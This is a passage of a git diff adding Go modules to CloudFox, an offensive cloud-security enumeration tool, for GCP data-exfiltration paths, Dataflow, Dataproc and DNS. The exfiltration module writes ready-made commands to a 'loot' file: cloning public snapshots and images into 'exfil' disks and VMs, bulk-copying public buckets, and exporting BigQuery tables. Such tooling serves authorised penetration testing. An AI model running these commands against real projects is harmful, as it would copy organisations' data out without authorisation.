gcpinternal.BaseGCPModule + + ExfiltrationPaths []ExfiltrationPath + PublicExports []PublicExport + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DataExfiltrationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataExfiltrationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataExfiltrationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_DATAEXFILTRATION_MODULE_NAME) + if err != nil { + return + } + + module := &DataExfiltrationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExfiltrationPaths: []ExfiltrationPath{}, + PublicExports: []PublicExport{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Identifying data exfiltration paths...", GCP_DATAEXFILTRATION_MODULE_NAME) + + // Process each project + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) + + // Check results + if len(m.ExfiltrationPaths) == 0 && len(m.PublicExports) == 0 { + logger.InfoM("No data exfiltration paths found", GCP_DATAEXFILTRATION_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, p := range m.ExfiltrationPaths { + switch p.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d exfiltration path(s) and %d public export(s): %d 
CRITICAL, %d HIGH", + len(m.ExfiltrationPaths), len(m.PublicExports), criticalCount, highCount), GCP_DATAEXFILTRATION_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing exfiltration paths in project: %s", projectID), GCP_DATAEXFILTRATION_MODULE_NAME) + } + + // 1. Find public/shared snapshots + m.findPublicSnapshots(ctx, projectID, logger) + + // 2. Find public/shared images + m.findPublicImages(ctx, projectID, logger) + + // 3. Find public buckets + m.findPublicBuckets(ctx, projectID, logger) + + // 4. Find cross-project logging sinks + m.findLoggingSinks(ctx, projectID, logger) + + // 5. Analyze potential exfiltration vectors + m.analyzeExfiltrationVectors(ctx, projectID, logger) +} + +// findPublicSnapshots finds snapshots that are publicly accessible or shared +func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not create Compute service in project %s", projectID)) + return + } + + req := computeService.Snapshots.List(projectID) + err = req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + // Get IAM policy for snapshot + policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() + if err != nil { + continue + } + + // Check for public access + isPublic := false + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "public" + break 
+ } + if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + break + } + } + } + + if isPublic { + export := PublicExport{ + ResourceType: "snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "disk_snapshot", + Size: fmt.Sprintf("%d GB", snapshot.DiskSizeGb), + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Public disk snapshot (%d GB)", snapshot.DiskSizeGb), + Destination: "Anyone on the internet", + RiskLevel: "CRITICAL", + RiskReasons: []string{"Snapshot is publicly accessible", "May contain sensitive data from disk"}, + ExploitCommand: fmt.Sprintf( + "# Create disk from public snapshot\n"+ + "gcloud compute disks create exfil-disk --source-snapshot=projects/%s/global/snapshots/%s --zone=us-central1-a", + projectID, snapshot.Name), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list snapshots in project %s", projectID)) + } +} + +// findPublicImages finds images that are publicly accessible or shared +func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Images.List(projectID) + err = req.Pages(ctx, func(page *compute.ImageList) error { + for _, image := range page.Items { + // Get IAM policy for image + policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() + if err != nil { + continue + } + + // Check for public access + isPublic := false + accessLevel := "" + 
for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "public" + break + } + if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + break + } + } + } + + if isPublic { + export := PublicExport{ + ResourceType: "image", + ResourceName: image.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "vm_image", + Size: fmt.Sprintf("%d GB", image.DiskSizeGb), + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "image", + ResourceName: image.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Public VM image (%d GB)", image.DiskSizeGb), + Destination: "Anyone on the internet", + RiskLevel: "CRITICAL", + RiskReasons: []string{"VM image is publicly accessible", "May contain embedded credentials or sensitive data"}, + ExploitCommand: fmt.Sprintf( + "# Create instance from public image\n"+ + "gcloud compute instances create exfil-vm --image=projects/%s/global/images/%s --zone=us-central1-a", + projectID, image.Name), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list images in project %s", projectID)) + } +} + +// findPublicBuckets finds GCS buckets with public access +func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectID string, logger internal.Logger) { + storageService, err := storage.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not create Storage service in project %s", projectID)) + return + } + + // List buckets + resp, err := 
storageService.Buckets.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list buckets in project %s", projectID)) + return + } + + for _, bucket := range resp.Items { + // Get IAM policy for bucket + policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() + if err != nil { + continue + } + + // Check for public access + isPublic := false + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "public" + break + } + if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + break + } + } + } + + if isPublic { + export := PublicExport{ + ResourceType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "gcs_bucket", + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + Description: "Public GCS bucket", + Destination: "Anyone on the internet", + RiskLevel: "CRITICAL", + RiskReasons: []string{"Bucket is publicly accessible", "May contain sensitive files"}, + ExploitCommand: fmt.Sprintf( + "# List public bucket contents\n"+ + "gsutil ls -r gs://%s/\n"+ + "# Download all files\n"+ + "gsutil -m cp -r gs://%s/ ./exfil/", + bucket.Name, bucket.Name), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } +} + +// findLoggingSinks finds logging sinks that export to external destinations +func (m *DataExfiltrationModule) findLoggingSinks(ctx context.Context, projectID string, logger internal.Logger) { + // Common exfiltration patterns via logging sinks + // This would require the Logging API to be called + // For now, we'll add known 
exfiltration patterns + + path := ExfiltrationPath{ + PathType: "logging_sink", + ResourceName: "cross-project-sink", + ProjectID: projectID, + Description: "Logging sinks can export logs to external projects or Pub/Sub topics", + Destination: "External project or Pub/Sub topic", + RiskLevel: "MEDIUM", + RiskReasons: []string{"Logs may contain sensitive information", "External destination may be attacker-controlled"}, + ExploitCommand: fmt.Sprintf( + "# List logging sinks\n"+ + "gcloud logging sinks list --project=%s\n"+ + "# Create sink to external destination\n"+ + "# gcloud logging sinks create exfil-sink --project=%s", + projectID, projectID), + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.mu.Unlock() +} + +// analyzeExfiltrationVectors analyzes potential exfiltration methods +func (m *DataExfiltrationModule) analyzeExfiltrationVectors(ctx context.Context, projectID string, logger internal.Logger) { + // Common exfiltration vectors in GCP + vectors := []ExfiltrationPath{ + { + PathType: "bigquery_export", + ResourceName: "*", + ProjectID: projectID, + Description: "BigQuery datasets can be exported to GCS or queried directly", + Destination: "GCS bucket or external table", + RiskLevel: "MEDIUM", + RiskReasons: []string{"BigQuery may contain sensitive data", "Export destination may be accessible"}, + ExploitCommand: fmt.Sprintf( + "# List BigQuery datasets\n"+ + "bq ls --project_id=%s\n"+ + "# Export table to GCS\n"+ + "bq extract --destination_format=CSV 'dataset.table' gs://bucket/export.csv", + projectID), + }, + { + PathType: "pubsub_subscription", + ResourceName: "*", + ProjectID: projectID, + Description: "Pub/Sub push subscriptions can send data to external endpoints", + Destination: "External HTTP endpoint", + RiskLevel: "HIGH", + RiskReasons: []string{"Push subscriptions send data to configured endpoints", "Endpoint may be attacker-controlled"}, + ExploitCommand: fmt.Sprintf( + "# List Pub/Sub topics and 
subscriptions\n"+ + "gcloud pubsub topics list --project=%s\n"+ + "gcloud pubsub subscriptions list --project=%s", + projectID, projectID), + }, + { + PathType: "cloud_functions", + ResourceName: "*", + ProjectID: projectID, + Description: "Cloud Functions can be used to exfiltrate data via HTTP", + Destination: "External HTTP endpoint", + RiskLevel: "HIGH", + RiskReasons: []string{"Functions can make outbound HTTP requests", "Can access internal resources and exfiltrate data"}, + ExploitCommand: fmt.Sprintf( + "# List Cloud Functions\n"+ + "gcloud functions list --project=%s", + projectID), + }, + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, vectors...) + for _, v := range vectors { + m.addExfiltrationPathToLoot(v) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DataExfiltrationModule) initializeLootFiles() { + m.LootMap["data-exfiltration-commands"] = &internal.LootFile{ + Name: "data-exfiltration-commands", + Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } +} + +// formatExfilType converts internal type names to user-friendly display names +func formatExfilType(pathType string) string { + typeMap := map[string]string{ + "snapshot": "Disk Snapshot", + "image": "VM Image", + "bucket": "Storage Bucket", + "bigquery_export": "BigQuery Export", + "pubsub_subscription": "Pub/Sub Subscription", + "cloud_functions": "Cloud Function", + "logging_sink": "Logging Sink", + } + if friendly, ok := typeMap[pathType]; ok { + return friendly + } + return pathType +} + +func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath) { + if path.ExploitCommand == "" { + return + } + + // Add to consolidated commands file with description + m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf( + "## %s: %s (Project: %s)\n"+ + "# %s\n"+ + "# Destination: %s\n", + 
formatExfilType(path.PathType), + path.ResourceName, + path.ProjectID, + path.Description, + path.Destination, + ) + + // Add exploit commands + m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single merged table for all exfiltration paths + header := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Destination", + "Public", + "Size", + } + + var body [][]string + + // Track which resources we've added from PublicExports to avoid duplicates + publicResources := make(map[string]PublicExport) + for _, e := range m.PublicExports { + key := fmt.Sprintf("%s:%s:%s", e.ProjectID, e.ResourceType, e.ResourceName) + publicResources[key] = e + } + + // Add exfiltration paths + for _, p := range m.ExfiltrationPaths { + // Check if this is also in public exports + key := fmt.Sprintf("%s:%s:%s", p.ProjectID, p.PathType, p.ResourceName) + publicExport, isPublic := publicResources[key] + + publicStatus := "No" + size := "-" + if isPublic { + publicStatus = "Yes" + size = publicExport.Size + // Remove from map so we don't add it again + delete(publicResources, key) + } + + body = append(body, []string{ + p.ProjectID, + m.GetProjectName(p.ProjectID), + p.ResourceName, + formatExfilType(p.PathType), + p.Destination, + publicStatus, + size, + }) + } + + // Add any remaining public exports not already covered + for _, e := range publicResources { + body = append(body, []string{ + e.ProjectID, + m.GetProjectName(e.ProjectID), + e.ResourceName, + formatExfilType(e.ResourceType), + "Public access", + "Yes", + e.Size, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper 
authorization!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "data-exfiltration", + Header: header, + Body: body, + }) + } + + output := DataExfiltrationOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go new file mode 100644 index 00000000..d67efd20 --- /dev/null +++ b/gcp/commands/dataflow.go @@ -0,0 +1,197 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + dataflowservice "github.com/BishopFox/cloudfox/gcp/services/dataflowService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDataflowCommand = &cobra.Command{ + Use: globals.GCP_DATAFLOW_MODULE_NAME, + Aliases: []string{"df", "pipelines"}, + Short: "Enumerate Dataflow jobs and pipelines", + Long: `Enumerate Dataflow jobs with security analysis. 
+ +Features: +- Lists all Dataflow jobs (batch and streaming) +- Shows service account configuration +- Identifies network exposure (public IPs) +- Analyzes temp/staging storage locations +- Detects default service account usage`, + Run: runGCPDataflowCommand, +} + +type DataflowModule struct { + gcpinternal.BaseGCPModule + Jobs []dataflowservice.JobInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type DataflowOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataflowOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataflowOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPDataflowCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAFLOW_MODULE_NAME) + if err != nil { + return + } + + module := &DataflowModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Jobs: []dataflowservice.JobInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAFLOW_MODULE_NAME, m.processProject) + + if len(m.Jobs) == 0 { + logger.InfoM("No Dataflow jobs found", globals.GCP_DATAFLOW_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicIPs := 0 + for _, job := range m.Jobs { + if job.State == "JOB_STATE_RUNNING" { + running++ + } + if job.UsePublicIPs { + publicIPs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataflow job(s) (%d running, %d with public IPs)", + len(m.Jobs), running, publicIPs), globals.GCP_DATAFLOW_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataflowModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating 
Dataflow in project: %s", projectID), globals.GCP_DATAFLOW_MODULE_NAME) + } + + svc := dataflowservice.New() + jobs, err := svc.ListJobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAFLOW_MODULE_NAME, + fmt.Sprintf("Could not list Dataflow jobs in project %s", projectID)) + return + } + + m.mu.Lock() + m.Jobs = append(m.Jobs, jobs...) + for _, job := range jobs { + m.addToLoot(job) + } + m.mu.Unlock() +} + +func (m *DataflowModule) initializeLootFiles() { + m.LootMap["dataflow-commands"] = &internal.LootFile{ + Name: "dataflow-commands", + Contents: "# Dataflow Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *DataflowModule) addToLoot(job dataflowservice.JobInfo) { + m.LootMap["dataflow-commands"].Contents += fmt.Sprintf( + "## Job: %s (Project: %s, Location: %s)\n"+ + "# ID: %s\n"+ + "# Type: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Public IPs: %v\n"+ + "# Workers: %d\n\n"+ + "# Describe job:\n"+ + "gcloud dataflow jobs describe %s --project=%s --region=%s\n"+ + "# Show job details:\n"+ + "gcloud dataflow jobs show %s --project=%s --region=%s\n"+ + "# Cancel job (if running):\n"+ + "gcloud dataflow jobs cancel %s --project=%s --region=%s\n\n", + job.Name, job.ProjectID, job.Location, + job.ID, + job.Type, + job.State, + job.ServiceAccount, + job.UsePublicIPs, + job.NumWorkers, + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + ) +} + +func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Project Name", + "Name", + "Type", + "State", + "Location", + "Service Account", + "Public IPs", + "Workers", + } + + var body [][]string + for _, job := range m.Jobs { + publicIPs := "No" + if job.UsePublicIPs { + publicIPs = "Yes" + } + + body = append(body, []string{ + job.ProjectID, + 
m.GetProjectName(job.ProjectID), + job.Name, + job.Type, + job.State, + job.Location, + job.ServiceAccount, + publicIPs, + fmt.Sprintf("%d", job.NumWorkers), + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{{Name: "dataflow", Header: header, Body: body}} + + output := DataflowOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) + } +} diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go new file mode 100644 index 00000000..ae6fdfdf --- /dev/null +++ b/gcp/commands/dataproc.go @@ -0,0 +1,242 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDataprocCommand = &cobra.Command{ + Use: globals.GCP_DATAPROC_MODULE_NAME, + Aliases: []string{"dp", "hadoop", "spark"}, + Short: "Enumerate Dataproc clusters", + Long: `Enumerate Dataproc (Hadoop/Spark) clusters. 
+ +Features: +- Lists all Dataproc clusters across regions +- Shows service account configuration +- Identifies public IP exposure +- Checks for Kerberos authentication +- Analyzes security configurations`, + Run: runGCPDataprocCommand, +} + +type DataprocModule struct { + gcpinternal.BaseGCPModule + Clusters []dataprocservice.ClusterInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type DataprocOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataprocOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataprocOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPDataprocCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAPROC_MODULE_NAME) + if err != nil { + return + } + + module := &DataprocModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []dataprocservice.ClusterInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataprocModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAPROC_MODULE_NAME, m.processProject) + + if len(m.Clusters) == 0 { + logger.InfoM("No Dataproc clusters found", globals.GCP_DATAPROC_MODULE_NAME) + return + } + + runningCount := 0 + publicCount := 0 + for _, cluster := range m.Clusters { + if cluster.State == "RUNNING" { + runningCount++ + } + if !cluster.InternalIPOnly { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataproc cluster(s) (%d running, %d with public IPs)", + len(m.Clusters), runningCount, publicCount), globals.GCP_DATAPROC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataprocModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + 
logger.InfoM(fmt.Sprintf("Enumerating Dataproc in project: %s", projectID), globals.GCP_DATAPROC_MODULE_NAME) + } + + svc := dataprocservice.New() + + clusters, err := svc.ListClusters(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAPROC_MODULE_NAME, + fmt.Sprintf("Could not list Dataproc clusters in project %s", projectID)) + return + } + + m.mu.Lock() + m.Clusters = append(m.Clusters, clusters...) + for _, cluster := range clusters { + m.addToLoot(cluster) + } + m.mu.Unlock() +} + +func (m *DataprocModule) initializeLootFiles() { + m.LootMap["dataproc-commands"] = &internal.LootFile{ + Name: "dataproc-commands", + Contents: "# Dataproc Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *DataprocModule) addToLoot(cluster dataprocservice.ClusterInfo) { + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s\n", + cluster.Name, cluster.Region, + cluster.ProjectID, + ) + + // gcloud commands + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "gcloud dataproc clusters describe %s --region=%s --project=%s\n"+ + "gcloud dataproc jobs list --cluster=%s --region=%s --project=%s\n", + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + ) + + // Bucket commands + if cluster.ConfigBucket != "" { + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n", + cluster.ConfigBucket, + ) + } + if cluster.TempBucket != "" { + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n", + cluster.TempBucket, + ) + } + + m.LootMap["dataproc-commands"].Contents += "\n" +} + +func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single table with one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "State", + "Master", + "Master Instances", + "Workers", + "Service Account", + "Public IPs", + 
"Kerberos", + "IAM Role", + "IAM Member", + } + + var body [][]string + for _, cluster := range m.Clusters { + sa := cluster.ServiceAccount + if sa == "" { + sa = "(default)" + } + + masterConfig := fmt.Sprintf("%s x%d", cluster.MasterMachineType, cluster.MasterCount) + workerConfig := fmt.Sprintf("%s x%d", cluster.WorkerMachineType, cluster.WorkerCount) + + // Master instances + masterInstances := "-" + if len(cluster.MasterInstanceNames) > 0 { + masterInstances = strings.Join(cluster.MasterInstanceNames, ", ") + } + + // If cluster has IAM bindings, create one row per binding + if len(cluster.IAMBindings) > 0 { + for _, binding := range cluster.IAMBindings { + body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.ProjectID, + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + boolToYesNo(!cluster.InternalIPOnly), + boolToYesNo(cluster.KerberosEnabled), + binding.Role, + binding.Member, + }) + } + } else { + // Cluster has no IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.ProjectID, + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + boolToYesNo(!cluster.InternalIPOnly), + boolToYesNo(cluster.KerberosEnabled), + "-", + "-", + }) + } + } + + tables := []internal.TableFile{{Name: "dataproc-clusters", Header: header, Body: body}} + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := DataprocOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, 
m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAPROC_MODULE_NAME) + } +} diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go new file mode 100644 index 00000000..9efb9b06 --- /dev/null +++ b/gcp/commands/dns.go @@ -0,0 +1,357 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + DNSService "github.com/BishopFox/cloudfox/gcp/services/dnsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDNSCommand = &cobra.Command{ + Use: globals.GCP_DNS_MODULE_NAME, + Aliases: []string{"zones", "cloud-dns"}, + Short: "Enumerate Cloud DNS zones and records with security analysis", + Long: `Enumerate Cloud DNS managed zones and records across projects. + +Features: +- Lists all DNS managed zones (public and private) +- Shows zone configuration (DNSSEC, visibility, peering) +- Enumerates DNS records for each zone +- Identifies interesting records (A, CNAME, TXT, MX) +- Shows private zone VPC bindings +- Generates gcloud commands for DNS management + +Security Columns: +- Visibility: public or private +- DNSSEC: Whether DNSSEC is enabled +- Networks: VPC networks for private zones +- Peering: Cross-project DNS peering + +Attack Surface: +- Public zones expose domain infrastructure +- TXT records may contain sensitive info (SPF, DKIM, verification) +- Private zones indicate internal network structure +- DNS forwarding may expose internal resolvers`, + Run: runGCPDNSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DNSModule struct { + gcpinternal.BaseGCPModule + + Zones []DNSService.ZoneInfo + Records []DNSService.RecordInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DNSOutput struct { + 
Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DNSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DNSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDNSCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DNS_MODULE_NAME) + if err != nil { + return + } + + module := &DNSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Zones: []DNSService.ZoneInfo{}, + Records: []DNSService.RecordInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DNS_MODULE_NAME, m.processProject) + + if len(m.Zones) == 0 { + logger.InfoM("No DNS zones found", globals.GCP_DNS_MODULE_NAME) + return + } + + // Count zone types + publicCount := 0 + privateCount := 0 + for _, zone := range m.Zones { + if zone.Visibility == 